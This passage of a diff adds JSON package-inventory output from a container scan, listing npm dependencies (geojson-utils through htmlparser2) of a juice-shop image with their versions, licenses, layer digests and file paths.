"pkg:npm/geojson-utils@1.1.0", + "UID": "5d28f409536948d6" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/geojson-utils/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "get-caller-file@2.0.5", + "Name": "get-caller-file", + "Identifier": { + "PURL": "pkg:npm/get-caller-file@2.0.5", + "UID": "31821b37e36c8831" + }, + "Version": "2.0.5", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/get-caller-file/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "get-intrinsic@1.3.0", + "Name": "get-intrinsic", + "Identifier": { + "PURL": "pkg:npm/get-intrinsic@1.3.0", + "UID": "aa0ab63e2741be1c" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/get-intrinsic/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "get-proto@1.0.1", + "Name": "get-proto", + "Identifier": { + "PURL": "pkg:npm/get-proto@1.0.1", + "UID": "1cf229e6d2e8a69" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/get-proto/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "get-stream@2.3.1", + "Name": "get-stream", + "Identifier": { + "PURL": "pkg:npm/get-stream@2.3.1", + "UID": "8454114c5574a2d8" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-unzip/node_modules/get-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "get-stream@3.0.0", + "Name": "get-stream", + "Identifier": { + "PURL": "pkg:npm/get-stream@3.0.0", + "UID": "d88408f9b9b5bdfd" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cacheable-request/node_modules/get-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "get-stream@3.0.0", + "Name": "get-stream", + "Identifier": { + "PURL": "pkg:npm/get-stream@3.0.0", + "UID": "6be470771810704" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/got/node_modules/get-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "get-stream@4.1.0", + "Name": "get-stream", + "Identifier": { + "PURL": "pkg:npm/get-stream@4.1.0", + "UID": "828397c0cb46a2b1" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/get-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "getobject@1.0.2", + "Name": "getobject", + "Identifier": { + "PURL": "pkg:npm/getobject@1.0.2", + "UID": "10c6fda9a15e11fc" + }, + "Version": "1.0.2", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/getobject/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "github-from-package@0.0.0", + "Name": "github-from-package", + "Identifier": { + "PURL": "pkg:npm/github-from-package@0.0.0", + "UID": "2f687d267e0db5f" + }, + "Version": "0.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/github-from-package/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "glob@10.5.0", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@10.5.0", + "UID": "23ebf575a538b7e2" + }, + "Version": "10.5.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/glob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "glob@7.1.7", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@7.1.7", + "UID": "cf08ae0dc591f60c" + }, + "Version": "7.1.7", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt/node_modules/glob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "glob@7.2.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@7.2.3", + "UID": "9e9c963e0d5a6577" + }, + "Version": "7.2.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@npmcli/move-file/node_modules/glob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "glob@7.2.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@7.2.3", + "UID": "6917e04ee373ae27" + }, + "Version": "7.2.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/archiver-utils/node_modules/glob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "glob@7.2.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@7.2.3", + "UID": "6485c4ebbaf24af5" + }, + "Version": "7.2.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/archiver/node_modules/glob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "glob@7.2.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@7.2.3", + "UID": "35b29226b7c7e803" + }, + "Version": "7.2.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/rimraf/node_modules/glob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "glob@7.2.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@7.2.3", + "UID": "9884070c67bfbfa1" + }, + "Version": "7.2.3", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/glob/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "global-modules@1.0.0", + "Name": "global-modules", + "Identifier": { + "PURL": "pkg:npm/global-modules@1.0.0", + "UID": "dbe57268826de04a" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/global-modules/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "global-prefix@1.0.2", + "Name": "global-prefix", + "Identifier": { + "PURL": "pkg:npm/global-prefix@1.0.2", + "UID": "4e88b387e8a016d5" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/global-prefix/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "gopd@1.2.0", + "Name": "gopd", + "Identifier": { + "PURL": "pkg:npm/gopd@1.2.0", + "UID": "d90c403a9d1ef74e" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/gopd/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "got@8.3.2", + "Name": "got", + "Identifier": { + "PURL": "pkg:npm/got@8.3.2", + "UID": "ffeef9b389fac3" + }, + "Version": "8.3.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/got/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "graceful-fs@4.2.11", + "Name": "graceful-fs", + "Identifier": { + "PURL": "pkg:npm/graceful-fs@4.2.11", + "UID": "a6e498213e678a42" + }, + "Version": "4.2.11", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/graceful-fs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "grunt@1.6.2", + "Name": "grunt", + "Identifier": { + "PURL": "pkg:npm/grunt@1.6.2", + "UID": "f60db0059172f860" + }, + "Version": "1.6.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "grunt-cli@1.5.0", + "Name": "grunt-cli", + "Identifier": { + "PURL": "pkg:npm/grunt-cli@1.5.0", + "UID": "73a0fabf20ca6d74" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-cli/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "grunt-contrib-compress@1.6.0", + "Name": "grunt-contrib-compress", + "Identifier": { + "PURL": "pkg:npm/grunt-contrib-compress@1.6.0", + "UID": "e578968e01c8ece3" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-contrib-compress/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "grunt-known-options@2.0.0", + "Name": "grunt-known-options", + "Identifier": { + "PURL": "pkg:npm/grunt-known-options@2.0.0", + "UID": "3a26553f47e6bbc6" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-known-options/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "grunt-legacy-log@3.0.1", + "Name": "grunt-legacy-log", + "Identifier": { + "PURL": "pkg:npm/grunt-legacy-log@3.0.1", + "UID": "44808811c9cb640f" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "grunt-legacy-log-utils@2.1.3", + "Name": "grunt-legacy-log-utils", + "Identifier": { + "PURL": "pkg:npm/grunt-legacy-log-utils@2.1.3", + "UID": "77624e629e3613ec" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log-utils/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "grunt-legacy-util@2.0.2", + "Name": "grunt-legacy-util", + "Identifier": { + "PURL": "pkg:npm/grunt-legacy-util@2.0.2", + "UID": "49b2f935e23b3ba0" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-util/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "grunt-replace-json@0.1.0", + "Name": "grunt-replace-json", + "Identifier": { + "PURL": "pkg:npm/grunt-replace-json@0.1.0", + "UID": "b3f3c36b4e64c44e" + }, + "Version": "0.1.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-replace-json/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "handlebars@4.7.9", + "Name": "handlebars", + "Identifier": { + "PURL": "pkg:npm/handlebars@4.7.9", + "UID": "db1b76a4ccef390b" + }, + "Version": "4.7.9", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/handlebars/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-ansi@2.0.0", + "Name": "has-ansi", + "Identifier": { + "PURL": "pkg:npm/has-ansi@2.0.0", + "UID": "a551fcad3d6a3bf3" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-bigints@1.1.0", + "Name": "has-bigints", + "Identifier": { + "PURL": "pkg:npm/has-bigints@1.1.0", + "UID": "2caecbec1ab78878" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-bigints/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-flag@3.0.0", + "Name": "has-flag", + "Identifier": { + "PURL": "pkg:npm/has-flag@3.0.0", + "UID": "4764fcff869871d9" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-flag/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-flag@4.0.0", + "Name": "has-flag", + "Identifier": { + "PURL": "pkg:npm/has-flag@4.0.0", + "UID": "daacd50b25bbf5f8" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log-utils/node_modules/has-flag/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-property-descriptors@1.0.2", + "Name": "has-property-descriptors", + "Identifier": { + "PURL": "pkg:npm/has-property-descriptors@1.0.2", + "UID": "6b7ca3f69a487d81" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-property-descriptors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-symbol-support-x@1.4.2", + "Name": "has-symbol-support-x", + "Identifier": { + "PURL": "pkg:npm/has-symbol-support-x@1.4.2", + "UID": "4b9794367f9e1927" + }, + "Version": "1.4.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-symbol-support-x/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-symbols@1.1.0", + "Name": "has-symbols", + "Identifier": { + "PURL": "pkg:npm/has-symbols@1.1.0", + "UID": "839f5c25c8fec90a" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-symbols/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-to-string-tag-x@1.4.1", + "Name": "has-to-string-tag-x", + "Identifier": { + "PURL": "pkg:npm/has-to-string-tag-x@1.4.1", + "UID": "8c4fab4dd3b8a525" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-to-string-tag-x/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-tostringtag@1.0.2", + "Name": "has-tostringtag", + "Identifier": { + "PURL": "pkg:npm/has-tostringtag@1.0.2", + "UID": "b459875aa9d222c9" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-tostringtag/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "has-unicode@2.0.1", + "Name": "has-unicode", + "Identifier": { + "PURL": "pkg:npm/has-unicode@2.0.1", + "UID": "4fc51ca1eaef1883" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-unicode/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "hashids@2.3.0", + "Name": "hashids", + "Identifier": { + "PURL": "pkg:npm/hashids@2.3.0", + "UID": "7a3f65fdb0ef217f" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/hashids/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "hasown@2.0.3", + "Name": "hasown", + "Identifier": { + "PURL": "pkg:npm/hasown@2.0.3", + "UID": "18762d21f050ccac" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/hasown/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "hbs@4.2.1", + "Name": "hbs", + "Identifier": { + "PURL": "pkg:npm/hbs@4.2.1", + "UID": "347780813f5380a" + }, + "Version": "4.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/hbs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "he@0.4.1", + "Name": "he", + "Identifier": { + "PURL": "pkg:npm/he@0.4.1", + "UID": "85423773da221cc9" + }, + "Version": "0.4.1", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/he/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "helmet@4.6.0", + "Name": "helmet", + "Identifier": { + "PURL": "pkg:npm/helmet@4.6.0", + "UID": "5e5baa82da08ca40" + }, + "Version": "4.6.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/helmet/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "hoister@0.0.2", + "Name": "hoister", + "Identifier": { + "PURL": "pkg:npm/hoister@0.0.2", + "UID": "3c75fb408cee6bdb" + }, + "Version": "0.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/hoister/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "homedir-polyfill@1.0.3", + "Name": "homedir-polyfill", + "Identifier": { + "PURL": "pkg:npm/homedir-polyfill@1.0.3", + "UID": "98efa53c99a94559" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/homedir-polyfill/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "hooker@0.2.3", + "Name": "hooker", + "Identifier": { + "PURL": "pkg:npm/hooker@0.2.3", + "UID": "7990e3cc22e8ffd" + }, + "Version": "0.2.3", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/hooker/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "html-entities@1.4.0", + "Name": "html-entities", + "Identifier": { + "PURL": "pkg:npm/html-entities@1.4.0", + "UID": "ec194d18658e1277" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/html-entities/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "htmlparser2@3.3.0", + "Name": "htmlparser2", + "Identifier": { + "PURL": "pkg:npm/htmlparser2@3.3.0", + "UID": "d839033414c8899c" + }, + "Version": "3.3.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": 